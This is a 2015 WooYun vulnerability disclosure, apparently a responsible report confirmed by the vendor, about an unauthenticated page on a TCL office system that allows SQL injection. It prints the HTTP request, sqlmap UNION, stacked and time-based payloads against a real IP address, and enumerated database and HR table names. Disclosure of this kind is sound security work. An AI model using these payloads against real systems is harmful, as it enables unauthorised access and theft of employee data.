当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-098588

漏洞标题:TCL某站未授权访问导致SQL注入

相关厂商:TCL官方网上商城

漏洞作者: 深度安全实验室

提交时间:2015-02-28 17:02

修复时间:2015-04-14 17:04

公开时间:2015-04-14 17:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-28: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-14: 细节向公众公开

简要描述:

按理说所有的页面都需要登陆才能访问,但是此页面不需要,导致注入。

详细说明:

TCL的OA系统:

http://218.106.133.136/


未授权访问的页面:

http://218.106.133.136/SearchCase/StatusInquiry.aspx

1.jpg

存在SQL注入,出现问题的地方:

POST /WebService/SearchCase.asmx/StatusInquiryInfo HTTP/1.1
Host: 218.106.133.136
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://218.106.133.136/SearchCase/StatusInquiry.aspx
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 109
start=0&limit=10&sort=applydt&dir=DESC&SeachFile=ALL%2CDB%2C2015-02-01%2C2015-02-27%2C%2C%2CA%2CALL%2Cnull%2C

dir参数有问题。

2.JPG


sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: POST
Parameter: dir
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: dir
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [10]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] tempdb


Hrm库中212个表:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: dir
Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: start=0&limit=10&sort=applydt&dir=DESC) UNION ALL SELECT NULL,NULL,NULL,CHAR(113)+CHAR(116)+CHAR(120)+CHAR(122)+CHAR(113)+CHAR(68)+CHAR(74)+CHAR(106)+CHAR(75)+CHAR(88)+CHAR(69)+CHAR(109)+CHAR(105)+CHAR(99)+CHAR(66)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(109)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: start=0&limit=10&sort=applydt&dir=DESC); WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: start=0&limit=10&sort=applydt&dir=DESC) WAITFOR DELAY '0:0:5'--&SeachFile=ALL,DB,2015-02-01,2015-02-27,,,A,ALL,null,
---
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: Hrm
[212 tables]
+--------------------------+
| AUTHORIZATION_TO_PAYMENT |
| Access_AreaMast |
| Access_AreaPermission |
| Access_DictDB |
| Access_DoorDetail |
| Access_DoorMast |
| Access_DoorStatus |
| Access_EntryRecord |
| Access_EquipmentMast |
| Access_GroupPermission |
| Access_OperationRecord |
| Access_TimeZone |
| Access_UserPermission |
| Budge_right_tree |
| DevCmds |
| Devinfo |
| DinSysAccount |
| EC_CJ_TEMP |
| EC_CONTACTBOOK |
| EC_LG_COSTWAT |
| EC_LG_ROOMDETAIL |
| EC_LG_ROOMMAST |
| EC_LG_ROOMPERSON |
| FAPAYMODEL |
| FAPINGZHENMODEL |
| FASUBJECT |
| FaceTmp |
| Finance_MainIndex |
| G4_worktimetable |
| GSTEMP |
| HR_ConBase |
| HR_DeptToWorkNo |
| HR_UserGroup |
| HR_condition |
| Hr_OutDept |
| Hr_Position |
| Hr_Position_Bak |
| Hr_SelectTemp |
| Hrm_Freeze |
| Kq_AllWorkHour |
| OACITY |
| OAPROMARY |
| OASUPPLIERNO |
| OA_Account |
| OA_AccountRight |
| OA_BC_BudgetCost |
| OA_BC_FreebackMSG |
| OA_BC_VariableCost |
| OA_BC_userright |
| OA_Car_Booking |
| OA_Car_Driver |
| OA_Car_Info |
| OA_CartNO |
| OA_CompanyTemp |
| OA_Controlsub |
| OA_DocuMentList |
| OA_EmailRemind |
| OA_EmailRemindtest |
| OA_Exam_DB |
| OA_Exam_ExamMain |
| OA_Exam_Options |
| OA_FB_DirtDB |
| OA_FB_Mainmast |
| OA_FinanceList |
| OA_FinancePayMent |
| OA_GICFinancial |
| OA_Hr_CommunicationBase |
| OA_Hr_DictDB |
| OA_Hr_EducationBase |
| OA_Hr_EmployeeBase |
| OA_Hr_EmployeeBaseSed |
| OA_Hr_FamilyBase |
| OA_Hr_LaborContract |
| OA_Hr_LanguageBase |
| OA_Hr_NationalTitles |
| OA_Hr_WorkExperience |
| OA_MES_Board |
| OA_MainDocuMent |
| OA_MeetingQuitment |
| OA_MeetingRoom |
| OA_Meetingarea |
| OA_MessTrans |
| OA_MsgTemp |
| OA_NextDeptCode |
| OA_Post |
| OA_PostAccount |
| OA_PrgHeadType |
| OA_ReplacecardRecord |
| OA_Role |
| OA_SMS |
| OA_UserRole |
| OA_WarehouseAuthorized |
| OA_base |
| OA_companydetail |
| OA_companymast |
| OA_companymast_bak |
| OA_deptleadership |
| OA_fiveSgr |
| OA_fiveSmsg |
| OMS_DocMain |
| OMS_MeetTable |
| OMS_Members |
| Oa_BC_Actualcost |
| Oa_BC_BUSapcodeTable |
| Oa_BC_BusinessCodeTable |
| Oa_BC_ChangeCode |
| Oa_BC_CodeTable |
| Oa_BC_Costrate |
| Oa_BC_FXrate |
| Oa_BC_SapcodeTable |
| Oa_BC_SubTable |
| Oa_Dictionary |
| Oa_Position |
| Oa_RightMast |
| Oa_dept |
| Oms_FileList |
| Oms_ItemDetail |
| Oms_ItemLog |
| Oms_ItemMenPer |
| Oms_ModelDetail |
| Oms_ModelMain |
| ProjectBase |
| ProjectItem |
| ProjectLog |
| SyncTemp |
| Sys_PrgMast |
| System_Menu |
| System_PrgMast |
| System_Update |
| System_UserMast |
| Table_1 |
| Tmp_10 |
| Tmp_9 |
| Tmp_90 |
| UserInfo |
| WF_Delegate |
| WF_ModelDetail |
| WF_ModelMast |
| att_record |
| budget_upload_excel |
| deptMesTOHrm |
| dtproperties |
| fix_category |
| fix_dictdb |
| fix_fixedmast |
| fix_mark |
| fix_mess |
| fix_news |
| fix_orders |
| fix_sorts |
| hr_AddrSFZ |
| hr_RzEmailInfo |
| hr_base |
| hr_class |
| hr_department |
| hr_dept |
| hr_deptcopy |
| hr_emp_titles |
| hr_employee |
| hr_employeeBF |
| hr_employeeForSAP319 |
| hr_employee_20140707 |
| hr_employee_app |
| hr_employee_lz |
| hr_employee_rz |
| hr_employee_tp |
| hr_employee_tp_bak |
| hr_employee_tpback |
| hr_lzgl |
| kq_DoorRecord |
| kq_LZDate |
| kq_Machines |
| kq_SpeOverTimeR |
| kq_SpeWorkRecord |
| kq_auto_Machines |
| kq_base |
| kq_cardlist |
| kq_finger |
| kq_holiday |
| kq_leave |
| kq_leaveDay |
| kq_leave_bak |
| kq_leave_main |
| kq_leavemonth |
| kq_machines_emp |
| kq_machines_log |
| kq_monthgs |
| kq_overtime |
| kq_overtime_bak |
| kq_transpose |
| kq_transpose_bak |
| kq_workday |
| kq_workday_bak |
| kq_workday_checkUp |
| kq_workmonth |
| kq_workmonth_lz |
| kq_workrecord |
| kq_workrecord_bak |
| kq_worktimetable |
| oa_TotalMoney |
| oa_TotalMoneySAP |
| oa_TotalMoney_Test |
| oa_accountbak |
| oa_totalmoney_Copy |
| oa_totalmoney_bak |
| sys_user |
| sys_userright |
| sysdiagrams |
| system_Per |
| tb_Temp |
| temptable |
| 查询 |
+--------------------------+


数据内容我就不去看了。。。

漏洞证明:

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-02-28 17:09

厂商回复:

感谢您的工作,已转交相关单位处理

最新状态:

暂无


漏洞评价:

评论